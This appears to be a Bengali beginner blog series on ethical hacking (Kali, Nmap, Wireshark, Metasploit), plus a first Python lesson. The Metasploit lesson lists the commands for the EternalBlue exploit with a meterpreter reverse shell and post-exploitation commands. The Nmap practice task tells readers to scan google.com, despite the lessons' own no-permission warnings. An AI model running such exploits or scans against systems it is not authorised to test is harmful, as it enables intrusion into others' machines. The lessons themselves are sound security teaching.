মেটাসপ্লয়েট দিয়ে হ্যাকিং শেখার মজা: শূন্য থেকে শুরু | বাংলায় গাইড

ইথিকাল হ্যাকিং ডে-৫: মেটাসপ্লয়েটের মজার জগতে!

হ্যালো, বন্ধু! শুরু করার আগে একটু কথা

মেটাসপ্লয়েট একটা দারুণ টুল—এটা দিয়ে আমরা সিস্টেমের দুর্বলতা খুঁজে সেগুলো ঠিক করতে শিখবো। তবে এটা শুধু ভালো কাজে ব্যবহার করতে হবে, যেমন:

• অনুমতি নিয়ে সিস্টেম টেস্ট করা
• নিজের নেটওয়ার্ক চেক করা
• শেখার জন্য গবেষণা

কেন? কারণ অনুমতি ছাড়া ব্যবহার করলে আইনি ঝামেলা হতে পারে। তাই আমরা সবসময় সঠিক পথে থাকবো, ঠিক আছে?

ধাপ ১: মেটাসপ্লয়েট চালু করি

শুরু করার প্রথম ধাপ

msfconsole

ক্যালি লিনাক্সে টার্মিনাল খুলে এটা লিখলেই মেটাসপ্লয়েট চালু হয়ে যাবে। কেন করছি? এটা আমাদের মূল কন্ট্রোল প্যানেল—এখান থেকেই সব কাজ শুরু হবে।

কী কী করা যায়, দেখি?

help

এটা লিখলে সব কমান্ডের লিস্ট দেখাবে। কেন? যেন আমরা বুঝতে পারি এই টুল দিয়ে কত কিছু করা যায়—একটু ঘুরে দেখার মতো!

ধাপ ২: এক্সপ্লয়েট খুঁজে বের করি

search eternalblue

এটা লিখলে EternalBlue নামের একটা দুর্বলতার এক্সপ্লয়েট খুঁজে পাবো। কেন? এটা একটা বিখ্যাত Windows দুর্বলতা—এটাকে টেস্ট করে আমরা শিখবো কীভাবে দুর্বলতা কাজে লাগে।

এক্সপ্লয়েট বেছে নিই

use exploit/windows/smb/ms17_010_eternalblue

এটা দিয়ে আমরা EternalBlue ব্যবহার করার জন্য প্রস্তুত হবো। কেন? কারণ এখন আমরা একটা নির্দিষ্ট টুল হাতে নিয়েছি—এটা দিয়ে কাজ শুরু করবো।

ধাপ ৩: টার্গেট সেট করি

কে আমাদের টার্গেট?

set RHOSTS 192.168.1.100

এখানে টার্গেট মেশিনের আইপি দিতে হবে। আমরা Metasploitable নামের একটা টেস্ট মেশিন ব্যবহার করছি। কেন? যেন আমরা কোন মেশিনে কাজ করছি সেটা টুলকে জানাতে পারি।

পেওলোড ঠিক করি

set payload windows/x64/meterpreter/reverse_tcp

এটা দিয়ে আমরা একটা পেওলোড সেট করবো। কেন? এটা আমাদের টার্গেটের সাথে সংযোগ তৈরি করবে এবং কন্ট্রোল দেবে—একটু ম্যাজিকের মতো!

একটু সাবধানতা!

Metasploitable একটা টেস্টিং মেশিন—এটা শুধু শেখার জন্য। তাই:

• আসল সার্ভারে চালাবো না
• ইন্টারনেটে খোলা রাখবো না
• অনুমতি ছাড়া কারো সিস্টেমে ঢুকবো না

কেন? আমরা শিখতে চাই, ক্ষতি করতে না। তাই নিরাপদে থাকি।

ল্যাব তৈরি করি

একটা টেস্টিং ল্যাব বানাতে এই ধাপগুলো ফলো করি:

1. Metasploitable 3 ডাউনলোড করি (গিটহাব থেকে)
2. VirtualBox বা VMWare এ চালাই
3. নেটওয়ার্ক সেটিং চেক করি (NAT বা Host-Only)
4. আইপি দেখি (ifconfig দিয়ে)

কেন? যেন আমাদের একটা নিরাপদ জায়গা থাকে শেখার জন্য।

ধাপ ৪: এক্সপ্লয়েট চালাই

exploit

এটা লিখলেই এক্সপ্লয়েট চলবে। সব ঠিক থাকলে মিটারপ্রিটার নামে একটা কন্ট্রোল পাবো। কেন? এটা আমাদের টার্গেটে ঢোকার দরজা খুলে দেবে।

মিটারপ্রিটারে মজা করি

কমান্ড	কী হবে?
sysinfo	টার্গেটের সিস্টেমের তথ্য দেখবো
screenshot	টার্গেটের স্ক্রিনের ছবি তুলবো
shell	কমান্ড প্রম্পটে ঢুকে যাবো

কেন? এগুলো দিয়ে আমরা টার্গেটের উপর কন্ট্রোল পাই এবং শিখি।

পরের ক্লাস: "ওয়েব হ্যাকিং: SQL ইনজেকশন শিখবো"

আমার সাথে শিখতে থাকুন!

#ইথিকাল_হ্যাকিং #মেটাসপ্লয়েট

নেটওয়ার্ক সিকিউরিটি: ওয়্যারশার্ক ব্যবহার করে প্যাকেট ক্যাপচার ও অ্যানালাইসিস।(ওয়্যারশার্কের ৫টি গুরুত্বপূর্ণ ফিল্টার)

 

ইথিকাল হ্যাকিং ডে-৪: ওয়্যারশার্ক দিয়ে নেটওয়ার্ক ট্রাফিক অ্যানালাইসিস

স্বাগতম বন্ধুরা! আজ আমরা শিখবো কিভাবে ওয়্যারশার্ক ব্যবহার করে নেটওয়ার্ক ট্রাফিক বিশ্লেষণ করতে হয়। ওয়্যারশার্ক হলো নেটওয়ার্ক ট্রাফিক মনিটরিংয়ের সবচেয়ে জনপ্রিয় টুল, যা দিয়ে আপনি রিয়েল টাইমে নেটওয়ার্কে চলমান সমস্ত ডেটা প্যাকেট দেখতে এবং বিশ্লেষণ করতে পারবেন।

ওয়্যারশার্ক ইনস্টলেশন

ক্যালি লিনাক্সে ওয়্যারশার্ক পূর্বই ইনস্টল করা থাকে। অন্য সিস্টেমে ইনস্টল করতে:

# উবুন্টু/ডেবিয়ান
sudo apt-get install wireshark

# উইন্ডোজ
https://www.wireshark.org/download.html থেকে ডাউনলোড করুন

ইনস্টলেশনের পর ওয়্যারশার্ক রান করতে:

sudo wireshark

গুরুত্বপূর্ণ সতর্কতা!

ওয়্যারশার্ক ব্যবহারের সময় মনে রাখবেন:

• অনুমতি ছাড়া অন্য কারো নেটওয়ার্ক ট্রাফিক ক্যাপচার করা অবৈধ
• শুধুমাত্র নিজের নেটওয়ার্ক বা অনুমতিপ্রাপ্ত নেটওয়ার্কে ব্যবহার করুন
• সেনসিটিভ তথ্য (যেমন পাসওয়ার্ড) ক্যাপচার করতে সতর্ক থাকুন

ওয়্যারশার্কের বেসিক ব্যবহার

১. নেটওয়ার্ক ইন্টারফেস সিলেক্ট করা

ওয়্যারশার্ক ওপেন করলে আপনি আপনার সমস্ত নেটওয়ার্ক ইন্টারফেস দেখতে পাবেন। সাধারণত:

• Wi-Fi কানেকশনের জন্য wlan0
• ইথারনেট কানেকশনের জন্য eth0

ক্যাপচার শুরু করতে আপনার ইন্টারফেস সিলেক্ট করে "Start" বাটনে ক্লিক করুন।

২. বেসিক ফিল্টারিং

স্পেসিফিক ট্রাফিক খুঁজতে ফিল্টার ব্যবহার করুন:

ফিল্টার	ব্যবহার	উদাহরণ
ip.addr	নির্দিষ্ট আইপির ট্রাফিক	ip.addr == 192.168.1.1
http	HTTP ট্রাফিক	http
tcp.port	নির্দিষ্ট পোর্ট	tcp.port == 80

প্র্যাকটিক্যাল উদাহরণ

HTTP ট্রাফিক অ্যানালাইসিস

1. ওয়্যারশার্কে ক্যাপচার শুরু করুন
2. ওয়েব ব্রাউজারে একটি HTTP সাইট ভিজিট করুন
3. ফিল্টার বারে "http" লিখুন
4. একটি HTTP রিকোয়েস্ট সিলেক্ট করুন
5. প্যাকেট ডিটেইলস দেখুন (URL, হেডার এবং অন্যান্য তথ্য)

সুরক্ষা টিপস

HTTPS ট্রাফিক সাধারণত এনক্রিপ্টেড থাকে। কিন্তু:

• HTTP সাইটে পাঠানো সকল তথ্য ক্লিয়ার টেক্সটে দেখা যায়
• এজন্য সবসময় HTTPS ব্যবহার করুন

আজকের ল্যাব টাস্ক

1. ওয়্যারশার্ক ইন্সটল করে নিজের নেটওয়ার্ক ট্রাফিক ক্যাপচার করুন
2. HTTP এবং DNS রিকোয়েস্ট খুঁজে বের করুন
3. একটি HTTP রিকোয়েস্টের ডিটেইলস বিশ্লেষণ করুন
4. ip.addr ফিল্টার ব্যবহার করে নির্দিষ্ট ডিভাইসের ট্রাফিক দেখুন

পরবর্তী ক্লাসে আমরা শিখবো মেটাসপ্লয়েট ফ্রেমওয়ার্কের বেসিক ব্যবহার। কোনো প্রশ্ন থাকলে কমেন্টে জানান!

#ওয়্যারশার্ক #নেটওয়ার্ক_অ্যানালাইসিস #প্যাকেট_স্নিফিং

নেটওয়ার্ক স্ক্যানিং শিখুন NMAP দিয়ে – হ্যাকারদের গোপন হাতিয়ার!

ইথিকাল হ্যাকিং ডে-৩: NMAP দিয়ে নেটওয়ার্ক স্ক্যানিং শিখুন

স্বাগতম বন্ধুরা! আজ আমরা শিখবো কিভাবে NMAP ব্যবহার করে নেটওয়ার্ক স্ক্যানিং করতে হয়। NMAP হলো সাইবার নিরাপত্তা জগতের সবচেয়ে শক্তিশালী টুলগুলোর মধ্যে একটি, যা দিয়ে আপনি নেটওয়ার্কের সমস্ত ডিভাইস, তাদের ওপেন পোর্ট এবং সার্ভিস সম্পর্কে জানতে পারবেন।

কেন NMAP শিখবেন?

একজন ইথিকাল হ্যাকার হিসেবে NMAP জানা আপনার জন্য অত্যন্ত গুরুত্বপূর্ণ কারণ:

• নেটওয়ার্কের নিরাপত্তা ঝুঁকি চিহ্নিত করতে
• অনুমতি সাপেক্ষে নেটওয়ার্ক পরীক্ষা করতে
• সিস্টেম অ্যাডমিনিস্ট্রেশন দক্ষতা বৃদ্ধি করতে
• সাইবার নিরাপত্তা পেশাদার হিসেবে ক্যারিয়ার গড়তে

NMAP ইনস্টলেশন

ক্যালি লিনাক্সে NMAP পূর্বই ইনস্টল করা থাকে। অন্য লিনাক্স ডিস্ট্রোতে ইনস্টল করতে:

sudo apt-get install nmap

NMAP এর বেসিক ব্যবহার

আসুন এখন কিছু বেসিক NMAP কমান্ড শিখি:

১. সাধারণ স্ক্যান

একটি আইপি অ্যাড্রেস স্ক্যান করতে:

nmap 192.168.1.1

এই কমান্ডটি টার্গেট আইপির ওপেন পোর্টগুলো খুঁজে বের করবে।

২. পোর্ট রেঞ্জ নির্দিষ্ট করে স্ক্যান

নির্দিষ্ট পোর্ট রেঞ্জ স্ক্যান করতে:

nmap -p 1-100 192.168.1.1

এটি শুধুমাত্র ১ থেকে ১০০ নম্বর পোর্ট স্ক্যান করবে।

NMAP এর কিছু গুরুত্বপূর্ণ অপশন

অপশন	বিবরণ	উদাহরণ
-sV	সার্ভিস ভার্সন ডিটেকশন	nmap -sV 192.168.1.1
-O	অপারেটিং সিস্টেম ডিটেকশন	nmap -O 192.168.1.1
-A	এগ্রেসিভ স্ক্যান (সব তথ্য)	nmap -A 192.168.1.1

নিরাপদে NMAP ব্যবহারের টিপস

ইথিকাল হ্যাকিং শেখার সময় মনে রাখবেন:

1. কখনোই অনুমতি ছাড়া কারো নেটওয়ার্ক স্ক্যান করবেন না
2. নিজের নেটওয়ার্ক বা ল্যাব এনভায়রনমেন্টে প্র্যাকটিস করুন
3. প্রতিটি কমান্ডের প্রভাব বুঝে ব্যবহার করুন

আজকের প্র্যাকটিক্যাল টাস্ক

নিচের কাজগুলো করুন এবং ফলাফল নোট করুন:

1. আপনার নিজের কম্পিউটারের লোকার্ল আইপি স্ক্যান করুন
2. একটি ওয়েবসাইটের আইপি স্ক্যান করে দেখুন (যেমন: google.com)
3. -sV অপশন ব্যবহার করে সার্ভিস ভার্সন চেক করুন

পরবর্তী ক্লাসে আমরা শিখবো ওয়্যারশার্ক দিয়ে প্যাকেট অ্যানালাইসিস। কোনো প্রশ্ন থাকলে কমেন্টে জানান!

#নেটওয়ার্ক_স্ক্যানিং #NMAP_গাইড #ইথিকাল_হ্যাকিং

ক্যালি লিনাক্স ইনস্টলেশন গাইড: ভার্চুয়ালবক্সে সেটআপ থেকে বেসিক কমান্ড শিখুন

ইথিকাল হ্যাকিং ডে-২: ক্যালি লিনাক্স সেটআপ ও ১০টি জরুরি কমান্ড!

আজকে আমরা শিখবো কিভাবে ক্যালি লিনাক্স ইন্সটল করবেন এবং এর বেসিক কমান্ডস ব্যবহার করে ফাইল সিস্টেম নেভিগেট করবেন।

ধাপ-১: ক্যালি লিনাক্স ইন্সটলেশন

1. VirtualBox ডাউনলোড করুন (লিংক)
2. ক্যালি লিনাক্স ISO ডাউনলোড করুন (অফিসিয়াল সাইট)
3. VirtualBox-এ নতুন VM ক্রিয়েট করুন (RAM: 4GB+, Storage: 25GB+)
4. ISO সিলেক্ট করে ইন্সটলেশন শেষ করুন

প্রথম ব্যবহারকারীদের জন্য টিপ: লাইভ USB বুট ব্যবহার করলে হার্ডডিস্কে ইন্সটল করার প্রয়োজন নেই!

ধাপ-২: ১০টি জরুরি কমান্ড

pwd - বর্তমান ডিরেক্টরি দেখুন

ls - ফাইল লিস্টিং

cd - ডিরেক্টরি পরিবর্তন

mkdir - নতুন ফোল্ডার তৈরি

cat - ফাইল কন্টেন্ট দেখুন

sudo - অ্যাডমিন পারমিশন নিন

apt update - প্যাকেজ লিস্ট আপডেট

clear - টার্মিনাল ক্লিয়ার

ifconfig - নেটওয়ার্ক ইনফো

man - হেল্প ম্যানুয়াল (যেমন: man ls)

আজকের চ্যালেঞ্জ!

ক্যালি লিনাক্সে লগইন করে এই ৩টি কাজ করুন:

1. mkdir ethical_hacking দিয়ে নতুন ফোল্ডার তৈরি করুন
2. cd ethical_hacking এ প্রবেশ করুন
3. touch day2.txt দিয়ে একটি ফাইল ক্রিয়েট করুন

পরবর্তী ক্লাস: "নেটওয়ার্ক স্ক্যানিং with Nmap"

কোন প্রশ্ন থাকলে কমেন্টে জানান!

ইথিকাল হ্যাকিং শুরু করুন শূন্য থেকে: প্রথম দিনের গাইড (হ্যান্ডস-অন সহ!)

 

ইথিকাল হ্যাকিং ১০১: প্রথম দিনেই জানুন বেসিকস

স্বাগতম আপনার হ্যাকিং শেখার যাত্রায়! আজকে আমরা আলোচনা করবো ইথিকাল হ্যাকিং জগতে প্রথম পদক্ষেপ কীভাবে নেবেন। চিন্তা করবেন না, আমি আপনাকে ধাপে ধাপে গাইড করবো।

ইথিকাল হ্যাকিং আসলে কী?

ইথিকাল হ্যাকিং মানে হলো অনুমতি নিয়ে কোনো সিস্টেমের দুর্বলতা খুঁজে বের করা এবং সেটি ফিক্স করতে সাহায্য করা। মনে রাখবেন, একজন ইথিকাল হ্যাকার আর একজন ক্র্যাকারের মধ্যে পার্থক্য হলো ইচ্ছা ও অনুমতি।

কেন শিখবেন ইথিকাল হ্যাকিং?

• 💼 ক্যারিয়ার অপারচুনিটি: সাইবার সিকিউরিটি ফিল্ডে চাহিদা দিন দিন বাড়ছে।
• 🛡️ নিজেকে সুরক্ষিত রাখুন: হ্যাকারদের থেকে আপনার ডেটা প্রটেক্ট করতে শিখুন।
• 🧠 টেকনোলজি বুঝুন: কম্পিউটার নেটওয়ার্ক কিভাবে কাজ করে তা গভীরভাবে জানতে পারবেন।

শুরুর জন্য যা জানা জরুরি

ইথিকাল হ্যাকিং শিখতে গেলে আপনাকে কিছু বেসিক জিনিস আগে থেকে জানতে হবে:

1. বেসিক নেটওয়ার্কিং: IP অ্যাড্রেস, TCP/UDP, পোর্টস
2. লিনাক্স অপারেটিং সিস্টেম: Kali Linux ব্যবহার করা শিখুন
3. প্রোগ্রামিং বেসিকস: Python বা Bash স্ক্রিপ্টিং

আজকের প্র্যাকটিস টাস্ক

আপনার কম্পিউটারে ipconfig (Windows) বা ifconfig (Linux/Mac) কমান্ড রান করে আপনার নিজের IP অ্যাড্রেস চেক করুন।

প্রশ্ন থাকলে কমেন্টে জানাতে পারেন!

পরবর্তী কী?

আগামীকাল আমরা শিখবো কিভাবে Kali Linux ইন্সটল করবেন এবং এর বেসিক কমান্ডস। আপনার প্রস্তুতি নিয়ে রাখুন!

#ইথিকাল_হ্যাকিং #সাইবার_সিকিউরিটি #বিগিনার্স_গাইড

ক্লাসটি কেমন লাগলো? নিচে কমেন্টে জানান!

 

ক্লাস 1 

পাইথন শিখি সহজে - ক্লাস ১: পাইথনের পরিচয়

ক্লাস ১: পাইথনের পরিচয়

লেভেল: বেসিক

হ্যালো বন্ধুরা! স্বাগতম পাইথন শেখার এই মজার জগতে। আজ আমরা শুরু করব একেবারে প্রথম ধাপ থেকে। এই ক্লাসে আমরা জানব পাইথন কী, কেন এটি শিখব এবং কীভাবে শুরু করব। তাহলে চলো, একটু মজা করে শিখে ফেলি!

পাইথন কী?

পাইথন হলো একটি সহজ এবং শক্তিশালী প্রোগ্রামিং ভাষা। এটি ১৯৯১ সালে গুইডো ভ্যান রসম নামে একজন প্রোগ্রামার তৈরি করেছিলেন। পাইথন এতটাই সহজ যে এটি পড়তে অনেকটা আমাদের দৈনন্দিন ভাষার মতো লাগে। উদাহরণ দেখো:

print("হ্যালো বন্ধু!")

এই এক লাইন কোড দিয়ে তুমি স্ক্রিনে "হ্যালো বন্ধু!" লিখতে পারো। কী মজা, তাই না?

পাইথন কেন শিখব?

পাইথন শেখার অনেক কারণ আছে। কয়েকটা মজার কারণ দেখো:

• এটি শিখতে খুব সহজ, নতুনদের জন্য পারফেক্ট।
• ওয়েবসাইট, গেম, ডেটা বিশ্লেষণ—সব কিছুতে পাইথন ব্যবহার হয়।
• গুগল, ফেসবুক, নাসার মতো বড় কোম্পানিগুলো এটি ব্যবহার করে।

তো, তুমি যদি কিছু আকর্ষণীয় জিনিস বানাতে চাও, তাহলে পাইথন তোমার বন্ধু হতে পারে!

পাইথন কীভাবে শুরু করব?

পাইথন শুরু করতে প্রথমে তোমার কম্পিউটারে এটি ইনস্টল করতে হবে। চিন্তা করো না, এটা খুব সহজ। ধাপগুলো দেখো:

1. python.org ওয়েবসাইটে যাও।
2. তোমার কম্পিউটার (Windows, Mac, বা Linux) অনুযায়ী পাইথন ডাউনলোড করো।
3. ইনস্টলারটি চালিয়ে ইনস্টল করে ফেলো।
4. কমান্ড প্রম্পটে python --version লিখে চেক করো ইনস্টল হয়েছে কিনা।

ইনস্টল হয়ে গেলে তুমি প্রোগ্রামিং শুরু করতে প্রস্তুত!

তোমার প্রথম প্রোগ্রাম

একটি টেক্সট এডিটর (যেমন Notepad বা VS Code) খোলো। তারপর এই কোডটি লিখো:

print("আমি পাইথন শিখছি!")

এটি একটি ফাইল হিসেবে সেভ করো, যেমন first.py। তারপর কমান্ড প্রম্পটে গিয়ে python first.py লিখে রান করো। দেখবে স্ক্রিনে "আমি পাইথন শিখছি!" লেখা আসবে। বাহ, তুমি এখন একজন প্রোগ্রামার!

শেষ কথা

আজকের ক্লাসে আমরা পাইথনের সাথে পরিচিত হলাম এবং প্রথম প্রোগ্রাম লিখলাম। পরের ক্লাসে আমরা ভ্যারিয়েবল ও ডেটা টাইপ নিয়ে জানব। ততক্ষণ এই ছোট প্রোগ্রামটি দিয়ে মজা করো এবং কোন প্রশ্ন থাকলে আমাকে জানাও!